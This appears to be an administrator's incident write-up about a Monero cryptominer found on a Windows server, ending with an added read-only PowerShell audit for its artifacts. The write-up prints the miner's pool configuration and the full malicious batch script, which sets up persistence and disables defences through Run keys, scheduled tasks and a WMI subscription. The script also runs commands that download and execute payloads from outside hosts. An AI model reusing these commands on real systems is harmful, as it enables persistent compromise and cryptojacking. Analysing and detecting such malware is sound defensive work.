Infected with a Cryptomining Virus

article/2025/9/21 22:03:24

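Recently one of our servers was running extremely slowly. Task Manager showed CPU usage at 100%, and the autoruns.exe tool revealed abnormal tasks and processes.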
Opening the file path also turned up the following files: config.json, c3a.bat, wina.exe

The contents of config.json are as follows:

{"api": {"id": null,"worker-id": null},"http": {"enabled": true,"host": "127.0.0.1","port": 81,"access-token": null,"restricted": true},"autosave": true,"background": false,"colors": true,"randomx": {"init": -1,"numa": true},"cpu": {"enabled": true,"huge-pages": true,"hw-aes": null,"priority": null,"memory-pool": false,"asm": true,"cn": [[1, 0],[1, 2],[1, 4],[1, 6]],"cn-heavy": [[1, 0],[1, 2]],"cn-lite": [[1, 0],[1, 2],[1, 4],[1, 6],[1, 1],[1, 3]],"cn-pico": [[2, 0],[2, 2],[2, 4],[2, 6],[2, 1],[2, 3]],"cn/gpu": [0, 2, 4, 6, 1, 3],"rx": [0, 2, 4, 6],"rx/wow": [0, 2, 4, 6, 1, 3],"cn/0": false,"cn-lite/0": false,"rx/arq": "rx/wow"},"opencl": {"enabled": true,"cache": true,"loader": null,"platform": "AMD","cn/0": false,"cn-lite/0": false},"cuda": {"enabled": true,"loader": null,"nvml": true,"cn/0": false,"cn-lite/0": false},"donate-level": 0,"donate-over-proxy": 1,"log-file": null,"pools": [{"algo": null,"coin": "monero","url": "xmr-eu1.nanopool.org:14444","user": "4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka.top","pass": "x","rig-id": null,"nicehash": true,"keepalive": false,"enabled": true,"tls": false,"tls-fingerprint": null,"daemon": false,"self-select": null},{"algo": null,"coin": "monero","url": "xmr-eu2.nanopool.org:14444","user": "4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka.top2","pass": "x","rig-id": null,"nicehash": true,"keepalive": false,"enabled": true,"tls": false,"tls-fingerprint": null,"daemon": false,"self-select": null}],"print-time": 60,"health-print-time": 60,"retries": 5,"retry-pause": 5,"syslog": false,"user-agent": null,"watch": true
}

The contents of c3a.bat are as follows:

net1 user mm123$ /del&net1 user admin$a /del&net1 user sysadm05 /del
net stop AnyDesk&sc config AnyDesk start= disabled
attrib -s -h -r C:\Users\Default\AppData\Local\Temp\*.exe&attrib -s -h -r C:\Users\Default\AppData\Roaming\Tempo\*.exe&attrib -s -h -r C:\Users\Default\AppData\Roaming\*.exe
attrib -s -h -r C:\Users\asp\AppData\Local\Temp\*.exe&attrib -s -h -r C:\Users\asp\AppData\Roaming\Tempo\*.exe&attrib -s -h -r C:\Users\asp\AppData\Roaming\*.exe
attrib -s -h -r C:\Users\administrator\AppData\Local\Temp\*.exe&attrib -s -h -r C:\Users\administrator\AppData\Roaming\Tempo\*.exe&attrib -s -h -r C:\Users\administrator\AppData\Roaming\*.execacls C:\Windows\debug\WIA\*.exe /e /d everyone&cacls C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d everyone&cacls C:\Users\administrator\AppData\Roaming\Tempo /e /d everyone&cacls C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d system&cacls C:\Users\Default\AppData\Roaming\Tempo\*.exe /e /d everyone&cacls C:\Users\administrator\AppData\Roaming\Tempo /e /d system&cacls C:\Users\Default\AppData\Roaming\Tempo /e /d system&cacls C:\Users\Default\AppData\Roaming\Tempo /e /d everyone&cacls C:\Users\Default\AppData\Roaming\Tempo\*.exe /e /d system&cacls C:\Users\asp\AppData\Roaming\*.exe /e /g everyone:f&cacls C:\Users\administrator\AppData\Roaming /e /g everyone:f&cacls C:\Users\asp\AppData\Roaming\*.exe /e /g everyone:f&cacls C:\Users\administrator\AppData\Roaming /e /g everyone:f&cacls C:\Users\asp\AppData\Local\Temp /e /g system:f&cacls C:\Users\asp\AppData\Local\Temp /e /g everyone:f&cacls C:\Users\administrator\AppData\Local\Temp /e /g system:f&cacls C:\Users\administrator\AppData\Local\Temp /e /g everyone:f&cacls C:\Users\Default\AppData\Local\Temp /e /g everyone:f&cacls C:\Users\Default\AppData\Local\Temp /e /g everyone:f&cacls C:\Users\Default\AppData\Roaming /e /g everyone:f&cacls C:\Users\Default\AppData\Roaming /e /g system:f&cacls C:\Users\Default\AppData\Local\Temp\*.exe /e /g everyone:f&cacls C:\Users\Default\AppData\Local\Temp\*.exe /e /g everyone:f&cacls C:\Users\Default\AppData\Roaming\*.exe /e /g everyone:f&cacls C:\Users\Default\AppData\Roaming\*.exe /e /g system:f&cacls C:\SysData\*.exe /e /d system&cacls C:\Msupdate /e /d system&cacls C:\windows\xcecg /e /d system&cacls C:\windows\ccm /e /d system&cacls c:\windows\smss.exe /e /d system&cacls "C:\Program Files\Common Files\Services\*.exe" /e /d system&cacls C:\Windows\System32\a.exe /e /d system&cacls 
C:\Windows\security\*.exe /e /d system&cacls C:\Windows\security\*.exe /e /d everyone&cacls C:\Windows\Resources\*.exe /e /d system&cacls C:\Windows\Resources\*.exe /e /d everyone&cacls C:\Windows\Resources\Themes\*.exe /e /d system&cacls C:\Windows\Resources\Themes\*.exe /e /d everyone&cacls C:\WINDOWS\system\lsmsm.exe /e /d system&cacls C:\ProgramData\homegroup\*.exe /e /d system&cacls C:\ProgramData\diskdata\*.exe /e /d system&cacls "C:\Program Files\Microsoft Updates" /e /d system&cacls c:\windows\system32\servwdrv.dll /e /d system&cacls c:\windows\system32\servwdrv.dll /e /d everyone&cacls c:\windows\system32\servwdrvx.dll /e /d system&cacls c:\windows\system32\servwdrvx.dll /e /d everyone&cacls c:\windows\system32\serwwdrv.dll /e /d system&cacls c:\windows\system32\serwwdrv.dll /e /d everyone&cacls c:\windows\svchost.exe /e /d system&cacls C:\ProgramData\WmiAppSrv\svchost.exe /e /d system&cacls C:\Windows\Help\taskhost.exe /e /d system&cacls C:\Windows\Web\wininit.exe /e /d system&cacls C:\ProgramData\Microsoft\WmiAppSvr\csrss.exe /e /d system&cacls C:\Progra~1\Common~1\svshpst.exe /e /d system&cacls C:\Windows\fonts\system32\svchost.exe /e /d system&cacls C:\Windows\fonts\*.exe /e /d system&cacls C:\Windows\Fonts\Microsoft /e /d system&cacls "C:\WINDOWS\fonts\*.exe" /e /d system&cacls c:\windows\taskmgrs.exe /e /d system&cacls C:\Windows\security\IIS\*.exe /e /d system&cacls C:\Progra~1\Common~1\System\*.exe /e /d system&cacls C:\Progra~1\dll\*.exe /e /d system&cacls C:\Windows\Fonts\*.exe /e /d system&cacls C:\Progra~1\Common~1\Services\*.exe  /e /d system&cacls C:\Progra~1\Common~1\SpeechEngines\*.exe /e /d system&cacls C:\Windows\Fonts\system32\*.exe /e /d system&cacls C:\Windows\SpeechsTracing\*.exe /e /d system&cacls "C:\Program Files (x86)\Microsoft SvidiaTen\*.exe" /e /d system&cacLS C:\Progra~1\Common~1\Micros~1\*.exe /e /d system&cacls C:\System\*.exe /e /d system&cacls C:\windows\1\*.exe /e /d system&cacls c:\users\public\*.exe /e /d system&cacls 
"C:\Program Files\Common Files\conime.exe" /e /d system&cacls "C:\Program Files (x86)\Common Files\conime.exe" /e /d system&cacls C:\Progra~1\test\*.exe /e /d everyone&cacls C:\Windows\Fonts\help\*.exe /e /d system&cacls C:\Windows\web\*.exe /e /d system&cacls C:\ProgramData\diskdata\*.exe /e /d system&cacls "C:\Program Files\SQLWriter$\*.exe" /e /d system&cacls C:\Windows\Prefetch\*.exe /e /d system&cacls C:\ProgramData\WmiAppSvr\*.exe /e /d system&cacls C:\Windows\Fonts\Mysql\*.exe /e /d system&cacls C:\ProgramData\WmiAppSvr\*.exe /e /d system&cacls C:\Windows\SysWOW64\drivers\taskmgr.exe /e /d system&cacls C:\Windows\SysWOW64\drivers\svchost.exe /e /d system&cacls C:\Windows\temp\svchost.exe /e /d system&cacls C:\Windows\Fonts\Windows\*.exe /e /d system&cacls C:\Msupdate /e /d system&cacls C:\WINDOWS\Fonts\Windows\*.exe /e /d system&cacls C:\ProgramData\Temp\*.exe /e /d system&cacls C:\Users\Public\Music\*.exe /e /d everyone&cacls C:\Users\Public\Music\*.vbs /e /d system&cacls C:\Windows\Help\lsass.exe /e /d system&cacls C:\Windows\temp\*.dll /e /d system&cacls C:\Windows\debug\Nat\*.exe /e /d system&cacls C:\Windows\Registration\*.exe /e /d system&cacls C:\Users\User\AppData\Roaming\Tempo\*.exe /e /d everyone&cacls "C:\Program Files (x86)\Microsoft Blliasc\*.*" /e /d system&cacls "C:\Program Files (x86)\Microsoft SvidiaTen\*.exe" /e /d system&cacls c:\windows\syswow64\lsass.exe /e /d system&cacls c:\windows\system\lsaus.exe /e /d system&cacls "C:\ProgramData\clr_optimization_v4.0.30318_64\*.exe" /e /d system&cacls "C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\*.exe" /e /d system&cacls "C:\ProgramData\CodeGear\Microsoft Office\DataFiles\Windows\Config\Microsoft\Images\Bugger\*.exe" /e /d system&cacls C:\ProgramData\Microsoft\HelpLibrary\*.dll /e /d system&cacls C:\Windows\WBEM\ccproxy\*.exe /e /d system&cacls C:\ProgramData\Microsoft\Network\*.exe /e /d system&cacls c:\windows\system\lsmsm.exe /e /d system&cacls c:\windows\mysql.log /e /d system&cacls 
C:\Windows\Fonts\Msql\*.exe /e /d system&cacls C:\Windows\Media\Delta\aaf\*.exe /e /d system&cacls c:\windows\wtcs.exe /e /d system&cacls C:\Users\admin\AppData\Roaming\TempoRX\*.exe /e /d everyone&cacls C:\Users\administrator\AppData\Roaming\TempoRX\*.exe /e /d everyonetaskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im wodCmdTerm.exe /im win1ogins.exe /im win1ogins.exe /im lsaus.exe /im lsars.exe /im lsacs.exe /im regedit.exe /im lsmsm.exe /im v5.exe /im anydesk.exe /im sqler.exe /im sqlservr.exe /im NsCpuCNMiner64.exe /im NsCpuCNMiner32.exe /im tlscntr.exe /im eter.exe /im lsmo.exe /im lsarr.exe /im convert.exe /im WinSCV.exe /im ctfmonc.exe /im lsmose.exe /im svhost.exe /im secscan.exe /im wuauser.exe /im splwow64.exe /im boy.exe /IM powered.EXE /im systems.exe /im acnom.exe /im regdrv.exe /im mscsuscr.exe /im Pviunc.exe /im Bllianc.exe /im st.exe /im nvidia_update.exe /im dether.exe /im buff2.exe /im a.exe /im lacas.exe /im lsma.exe /im lsmab.exe /im wtcs.exe /im ASBservice.exe /im vid001.exe /im netsv.exe /im uihost64 /im uihost32.exe /im wina.exe /im microsoft.net.exe /im dmw.exe /im dhcpclient.exe /im ctfnom.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll" /f
reg add "HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll" /f
reg delete HKlm\Software\Microsoft\Windows\CurrentVersion\Run /v "start1" /f
reg delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "SHELL" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vid001.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uihost64.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uihost32.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
echo 127.0.0.1 kr1s.ru>> C:\Windows\System32\drivers\etc\hosts&echo 127.0.0.1 zcop.ru>> C:\Windows\System32\drivers\etc\hosts
net start MSSQLSERVER&del c:\windows\system\my1.bat
cmd /c net1 stop ASBservice&sc delete ASBservice&net1 stop msupdate&sc delete msupdate&net1 stop clr_optimization_v4.0.30328_64&sc delete clr_optimization_v4.0.30328_64&net1 stop MicrosoftMsql&sc delete MicrosoftMsql&net1 stop netsv&sc delete netsv&net1 stop NetworkServices&sc delete NetworkServices&net1 stop "Network Remote"&sc delete "Network Remote"&net1 stop "WinTaskCtrlService"&sc delete "WinTaskCtrlService"&net1 stop remotecall&sc delete remotecall&net1 stop rpcept&sc delete rpcept&net1 stop csrss&sc delete csrss&net1 stop "windows audio control"&sc delete "windows audio control"
schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe" /ru "system"  /sc onstart /F
schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system"  /sc onstart /F
schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p" /ru "system"  /sc onstart /F
schtasks /create /tn "Mysa3" /tr "cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe" /ru "system"  /sc onstart /F
schtasks /create /tn "ok" /tr "rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa" /ru "system"  /sc onstart /F
wmic process where "name='svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\svchost.exe'" delete
wmic process where "name='wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\wininit.exe'" delete
wmic process where "name='csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\csrss.exe'" delete
wmic process where "name='WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\WUDFHosts.exe'" delete
wmic process where "name='services.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\services.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\services.exe'" delete
wmic process where "name='lsass.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\lsass.exe'" deletewmic datafile where "Name='c:\\windows\\debug\\lsmos.exe'" get Version /value|findstr "=1\.0\.0\.1$"||((for /f %%a in ('wmic process where "ExecutablePath='c:\\windows\\debug\\lsmos.exe'" get ProcessId^|findstr "[0-9]"') do taskkill /f /pid %%a /t)&del "c:\windows\\debug\lsmos.exe")SCHTASKS /Delete /TN "WindowsUpdate1" /F&SCHTASKS /Delete /TN "OfficeUpdaterA" /F&SCHTASKS /Delete /TN "\Microsoft\Windows\RAC\BackUpEvent" /F&SCHTASKS /Delete /TN "WindowsUpdate3" /F&SCHTASKS /Delete /TN "at6" /F&SCHTASKS /Delete /TN "Windows_Update" /F&SCHTASKS /Delete /TN "Update" /F&SCHTASKS /Delete /TN "Update2" /F&SCHTASKS /Delete /TN "Update4" /F&SCHTASKS /Delete /TN "Update3" /F&SCHTASKS /Delete /TN "windowsinit" /F&SCHTASKS /Delete /TN "System Security Check" /F&SCHTASKS /Delete /TN "AdobeFlashPlayer" /F&SCHTASKS /Delete /TN "updat_windows" /F&SCHTASKS /Delete /TN "at1" /F&SCHTASKS /Delete /TN "at2" /F&SCHTASKS /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Enterprise]" /F&SCHTASKS /DELETE /TN "\Microsoft\Windows\UPnP\Services" /f&SCHTASKS /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Standard]" /Fsc config MpsSvc start= auto&net start MpsSvc
netsh ipsec static delete policy name=win
netsh ipsec static delete filterlist name=Allowlist
netsh ipsec static delete filterlist name=denylist
netsh ipsec static delete filteraction name=allow
netsh advfirewall firewall delete rule name="tcp all" dir=in
netsh advfirewall firewall delete rule name="deny tcp 445" dir=in
netsh advfirewall firewall delete rule name="deny tcp 139" dir=in
netsh advfirewall firewall delete rule name="tcpall" dir=out
netsh advfirewall set allprofiles state on
netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
netsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block
netsh advfirewall firewall add rule name="deny tcp 139" dir=in protocol=tcp localport=139 action=block
netsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow 
netsh ipsec static add policy name=win
netsh ipsec static add filterlist name=Allowlist
netsh ipsec static add filterlist name=denylist
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
netsh ipsec static add filteraction name=Allow action=permit
netsh ipsec static add filteraction name=deny action=block
netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
netsh ipsec static set policy name=win assign=y
ver | find "5.1." > NUL && sc config SharedAccess start= auto && echo Yes | reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters /t REG_DWORD /v SMBDeviceEnabled /d 0
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm2_filter" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm2_consumer" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="Windows Events Filter" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="Windows Events Consumer4" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="Windows Events Consumer" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='Windows Events Filter'" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckayoumm3" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="coronav" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="coronav2" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="coronav2" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='coronav2'" DELETEwmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="fuckamm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckamm4", CommandLineTemplate="cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll&regsvr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll&regsvr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:\"http://172.83.155.170:8170/s.xsl\""cmd /c start wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"fuckamm3\"", Consumer="CommandLineEventConsumer.Name=\"fuckamm4\""cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://223.25.247.152:8152/batpower.txt')del C:\windows\inf\c3a.bat
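
The listing above plants persistence in several places at once: scheduled tasks, Run keys, IFEO debugger values, a WMI event subscription, hosts entries and firewall rules. The following read-only audit is an added example, not part of the original post. It checks a host for each of those artifacts using only names taken from the listing. It assumes an elevated PowerShell 5.1 session on Windows Server 2012 or later (for `Get-ScheduledTask`, `Get-NetFirewallRule` and `Get-CimInstance`), and `Add-Finding` is a hypothetical helper defined here.

```powershell
# Added example: read-only audit. It reports artifacts and changes nothing.
# Assumes an elevated PowerShell 5.1 session on Windows Server 2012 or later.
# Every task, value, path and rule name is copied from the c3a.bat listing above.
$findings = [System.Collections.Generic.List[object]]::new()
function Add-Finding {   # hypothetical helper, not part of any tool
    param([string]$Type, [string]$Name, [string]$Detail)
    $findings.Add([pscustomobject]@{ Type = $Type; Name = $Name; Detail = $Detail })
}

# 1. Scheduled tasks created with "schtasks /create ... /ru system /sc onstart"
foreach ($t in 'Mysa', 'Mysa1', 'Mysa2', 'Mysa3', 'ok') {
    foreach ($task in @(Get-ScheduledTask -TaskName $t -ErrorAction SilentlyContinue)) {
        $cmd = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
        Add-Finding 'ScheduledTask' "$($task.TaskPath)$($task.TaskName)" $cmd
    }
}

# 2. Run-key value "start" (regsvr32 ... scrobj.dll) in both registry views
foreach ($k in 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
               'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run') {
    $v = (Get-ItemProperty -Path $k -Name 'start' -ErrorAction SilentlyContinue).start
    if ($v) { Add-Finding 'RunKey' "$k\start" $v }
}

# 3. IFEO "Debugger" values the script sets to "ntsd -d"
$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
foreach ($exe in 'vid001.exe', 'uihost64.exe', 'uihost32.exe') {
    $d = (Get-ItemProperty -Path "$ifeo\$exe" -Name 'Debugger' -ErrorAction SilentlyContinue).Debugger
    if ($d) { Add-Finding 'IFEO' $exe $d }
}

# 4. WMI event subscription: filter, command-line consumer and their binding.
#    The consumer is also matched on strings from its template, so a renamed
#    copy of the same consumer is still reported.
$cim = @{ Namespace = 'root\subscription'; ErrorAction = 'SilentlyContinue' }
Get-CimInstance @cim -ClassName __EventFilter |
    Where-Object { $_.Name -eq 'fuckamm3' } |
    ForEach-Object { Add-Finding 'WmiFilter' $_.Name $_.Query }
Get-CimInstance @cim -ClassName CommandLineEventConsumer |
    Where-Object { $_.Name -eq 'fuckamm4' -or $_.CommandLineTemplate -match 'DownloadString|scrobj\.dll' } |
    ForEach-Object { Add-Finding 'WmiConsumer' $_.Name $_.CommandLineTemplate }
Get-CimInstance @cim -ClassName __FilterToConsumerBinding |
    Where-Object { $_.Filter.Name -eq 'fuckamm3' -or $_.Consumer.Name -eq 'fuckamm4' } |
    ForEach-Object { Add-Finding 'WmiBinding' $_.Filter.Name "bound to $($_.Consumer.Name)" }

# 5. hosts entries the script appends for kr1s.ru and zcop.ru
$hostsFile = "$env:SystemRoot\System32\drivers\etc\hosts"
Select-String -Path $hostsFile -Pattern '\b(kr1s\.ru|zcop\.ru)\b' -ErrorAction SilentlyContinue |
    ForEach-Object { Add-Finding 'Hosts' "line $($_.LineNumber)" $_.Line.Trim() }

# 6. Paths the scheduled tasks download to or execute, plus the script itself
foreach ($p in 'C:\Windows\update.exe', 'C:\Windows\debug\item.dat', 'C:\Windows\debug\ok.dat',
               'C:\Windows\help\lsmosee.exe', 'C:\Windows\debug\lsmos.exe', 'C:\Windows\inf\c3a.bat') {
    if (Test-Path -LiteralPath $p) {
        $f = Get-Item -LiteralPath $p -Force
        Add-Finding 'File' $p "$($f.Length) bytes, modified $($f.LastWriteTime.ToString('s'))"
    }
}

# 7. Firewall rules added with "netsh advfirewall firewall add rule"
foreach ($r in 'tcp all', 'deny tcp 445', 'deny tcp 139', 'tcpall') {
    Get-NetFirewallRule -DisplayName $r -ErrorAction SilentlyContinue |
        ForEach-Object { Add-Finding 'FirewallRule' $_.DisplayName "$($_.Direction) $($_.Action) Enabled=$($_.Enabled)" }
}

if ($findings.Count) { $findings | Format-Table -AutoSize -Wrap }
else { 'No artifacts from the c3a.bat listing were found.' }
```

The IPsec policy named `win` is not covered by the script; `netsh ipsec static show policy name=win` displays it where the legacy IPsec context is still available.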
